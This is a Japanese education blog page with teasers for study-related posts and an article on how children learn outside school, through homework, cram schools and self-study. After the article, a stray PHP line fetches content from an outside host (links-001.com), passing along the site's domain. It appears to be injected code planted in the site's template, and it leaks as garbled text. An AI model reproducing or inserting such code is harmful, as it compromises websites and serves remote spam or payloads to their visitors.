前へ
次へ

分かるまで追求するか先に進むか

独学をするときはテキストなどで勉強を進めていきます。
学校などなら分からないところがあると自分

more

新しいことに興味を持たせる教育

勉強にはこれまで知らなかった分野に取り組むときと、これまでに習ったことを復習するときがあります。

more

子どもの能力に合った課題を与えているか

小学校の勉強は学年ごとに決まっていて、ある学年の時はその学年の教科書などを使って勉強します。

more

学校以外での学習の方法を知っておく

小学校や中学校は義務教育なので、特に受験もなく学校に行けますし授業料などなくどの家庭の子でも学べます。
毎日きちんと学校に通って勉強すれば中学卒業までの知識はしっかり得られそうです。
子どもにとっては学校は生活の一部分であってそれ以外にも自由な時間を持っていてそれをどう使うかになります。
学校以外において学習する時間がどれくらいか、どんな方法で勉強しているかがありまずは学校から出される宿題があります。
平均的には30分ぐらいを宿題に宛てるようです。
それ以外には塾などの教育サービスを利用する子、自発的に問題集などを自分で購入してそれに取り組む子などもいます。
小学生のころはまだまだ勉強の必要性が分からないこともあるので自発的に勉強をする子は少ないかもしれません。
でも将来的には自分で学ぶことも必要で、少しずつ自分で勉強ができるような教育が必要になるでしょう。
塾の中でも個別指導塾などは比較的自己学習を支援するサービスと言えそうです。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top